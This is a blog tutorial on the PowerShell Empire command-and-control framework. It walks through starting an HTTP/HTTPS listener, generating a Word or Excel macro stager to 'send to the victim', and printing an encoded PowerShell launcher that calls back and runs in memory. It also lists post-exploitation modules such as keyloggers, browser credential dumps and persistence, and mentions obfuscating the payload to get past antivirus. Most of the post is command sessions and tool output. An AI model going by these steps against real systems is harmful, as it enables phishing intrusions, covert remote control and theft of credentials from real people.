I've been playing around enough to familiarize myself with its core functionalities, exploring its different modules for post exploitation and trolling :-) I find Empire a great alternative to Metasploits' Meterpreter functions. Another notable feature of Empire is for spear phising attacks. Unfortuntely, I had not much luck obfuscating its payload as most AV products are able to detect it very easily. This was where I had to use crui0usJack/luckystrike to obfuscate the launcher code into innocent looking MS word & excel docs. I will cover luckystrike in my next post.
The first thing to understand about Empire are its components, firstly, there is a listener that is the C&C server. Then, there is the launcher or stager which is the infectious code that is to be executed on the victim host(also known as agents).
The agents will connect back to the listener upon successful execution of the launcher or stager code. It support https if you specify the CertPath dir. You can use the cert creation utility in the setup directory to create a self signing cert or use the default one in data dir. Remeber to specify the CertPath if you intend to use HTTPS communication on your listener. In this case, CertPath should be data.
Installing Empire is pretty straight forward, so I am not going to cover it. The first step upon starting Empire is to create a listener:
(Empire) > listeners
[*] Active listeners:
Name Module Host Delay/Jitter KillDate
---- ------ ---- ------------ --------
http http http://192.168.43.29:80 5/0.0
(Empire: listeners) > uselistener http
(Empire: listeners) > set CertPath data
(Empire: listeners) > info
Name Required Value Description
---- -------- ------- -----------
SlackToken False Your SlackBot API token to communicate with your Slack instance.
ProxyCreds False default Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
KillDate False Date for the listener to exit (MM/dd/yyyy).
Name True http Name for the listener.
Launcher True powershell -noP -sta -w 1 -enc Launcher string.
DefaultDelay True 5 Agent delay/reach back interval (in seconds).
DefaultLostLimit True 60 Number of missed checkins before exiting
WorkingHours False Hours for the agent to operate (09:00-17:00).
SlackChannel False #general The Slack channel or DM that notifications will be sent to.
DefaultProfile True /admin/get.php,/news.php,/login/ Default communication profile for the agent.
process.php|Mozilla/5.0 (Windows
NT 6.1; WOW64; Trident/7.0;
rv:11.0) like Gecko
Host True https://192.168.0.163:80 Hostname/IP for staging.
CertPath True data Certificate path for https listeners.
DefaultJitter True 0.0 Jitter in agent reachback interval (0.0-1.0).
Proxy False default Proxy to use for request (default, none, or other).
UserAgent False default User-agent string to use for the staging request (default, none, or other).
StagingKey True xxxxxxxxx Staging key for initial agent negotiation.
BindIP True 0.0.0.0 The IP to bind to on the control server.
Port True 80 Port for the listener.
ServerVersion True Microsoft-IIS/7.5 Server header for the control server.
StagerURI False URI for the stager. Must use /download/. Example: /download/stager.php
(Empire: listeners) > execute
(Empire: listeners) > info
Name Required Value Description
---- -------- ------- -----------
SlackToken False Your SlackBot API token to communicate with your Slack instance.
ProxyCreds False default Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
KillDate False Date for the listener to exit (MM/dd/yyyy).
Name True http Name for the listener.
Launcher True powershell -noP -sta -w 1 -enc Launcher string.
DefaultDelay True 5 Agent delay/reach back interval (in seconds).
DefaultLostLimit True 60 Number of missed checkins before exiting
WorkingHours False Hours for the agent to operate (09:00-17:00).
SlackChannel False #general The Slack channel or DM that notifications will be sent to.
DefaultProfile True /admin/get.php,/news.php,/login/ Default communication profile for the agent.
process.php|Mozilla/5.0 (Windows
NT 6.1; WOW64; Trident/7.0;
rv:11.0) like Gecko
Host True https://192.168.0.163:80 Hostname/IP for staging.
CertPath True data Certificate path for https listeners.
DefaultJitter True 0.0 Jitter in agent reachback interval (0.0-1.0).
Proxy False default Proxy to use for request (default, none, or other).
UserAgent False default User-agent string to use for the staging request (default, none, or other).
StagingKey True xxxxxxxxx Staging key for initial agent negotiation.
BindIP True 0.0.0.0 The IP to bind to on the control server.
Port True 80 Port for the listener.
ServerVersion True Microsoft-IIS/7.5 Server header for the control server.
StagerURI False URI for the stager. Must use /download/. Example: /download/stager.php
(Empire: listeners) > execute
Now that the listener is up and running, you can create the stager. Stagers are useful for phising attacks as the code can be easily embedded either as a .hta, .bat or macro into MS docs. Also worth to note that Empire supports python other than powershell.
(Empire: agents) > usestager windows/macro
(Empire: agents) > info
(Empire: stager/windows/macro) > set Listener http
Name Required Value Description
---- -------- ------- -----------
Listener True Listener to generate stager for.
OutFile False /tmp/macro File to output macro to, otherwise
displayed on the screen.
Obfuscate False False Switch. Obfuscate the launcher
powershell code, uses the
ObfuscateCommand for obfuscation types.
For powershell only.
ObfuscateCommand False Token\All\1,Launcher\STDIN++\12467The Invoke- Obfuscation command to use.
Only used if Obfuscate switch is True.
For powershell only.
Language True powershell Language of the stager to generate.
ProxyCreds False default Proxy credentials
([domain\]username:password) to use for
request (default, none, or other).
UserAgent False default User-agent string to use for the staging
request (default, none, or other).
Proxy False default Proxy to use for request (default, none,
or other).
StagerRetries False 0 Times for the stager to retry
connecting.
[*] Stager output written out to: /tmp/macro
Transfer the stager code into an MS Excel or Word file in the Macro section:
Remeber to save the file in Windows 97-2003 format and send the file to the victim after dressing it up.
If you intend to use Empire as a lateral movement tool, use the launcher instead. the launcher is a simple powershell command encoded in base64, that will first call back to the listener server and upon interaction, it will execute directly in memory invoking your evil deeds. It contains plenty of useful modules that can aid penetration testers and red teams to pivot to different victim hosts.
(Empire: listeners) > launcher powershell http
powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAHIAcwBJAE8AbgBUAGEAYgBMAEUALgBQAFMAVgBFAHIAcwBJAG8AbgAuAE0AQQBqAG8AUgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAcgBFAGYAXQAuAEEAUwBTAEUATQBiAEwAWQAuAEcAZQBUAFQAeQBQAGUAKAAnAF<snip>
(Empire: listeners) >
Once the agents have called back, you can begin to interact with it:
(Empire: listeners) > agents
[*] Active agents:
Name La Internal IP Machine Name Username Process PID Delay Last Seen
---- -- ----------- ------------ -------- ------- --- ----- ---------
5CXNH6SE ps 172.16.155.132 WIN-5JJL1Q0I52G WIN-5JJL1Q0I52G\sr powershell 1212 5/0.0 2018-10-28 14:57:50
C3M5VPB2 ps 172.16.155.132 WIN-5JJL1Q0I52G WIN-5JJL1Q0I52G\sr powershell 5104 5/0.0 2018-10-28 14:57:50
(Empire: agents) >
Empire commands support the tab completion, so if you are not sure, just press tab. I find the following modules very useful:
(Empire: 5CXNH6SE) > usemodule
Display all 204 possibilities? (y or n)
code_execution/invoke_dllinjection persistence/elevated/wmi*
code_execution/invoke_metasploitpayload persistence/elevated/wmi_updater*
code_execution/invoke_ntsd persistence/misc/add_netuser
code_execution/invoke_reflectivepeinjection persistence/misc/add_sid_history*
code_execution/invoke_shellcode persistence/misc/debugger*
code_execution/invoke_shellcodemsil persistence/misc/disable_machine_acct_change*
collection/ChromeDump persistence/misc/get_ssps
collection/FoxDump persistence/misc/install_ssp*
collection/USBKeylogger* persistence/misc/memssp*
collection/WebcamRecorder persistence/misc/skeleton_key*
<snip>
<snip>
As mentioned, for phising attacks, most AV will pick up the execution of powershell commands even in memory. I suggest better obfuscation techniques, this is where luckystrike comes in handy.
Here is a video of Empire in action - Part One
Here is Part 2 of Empire in action, demonstrate the generation of stager code to be used in MS Office Word docs using macro:
Finale part demo of Empire functions such as download, shell exec, screendump, vnc and keylogger functions.
No comments:
Post a Comment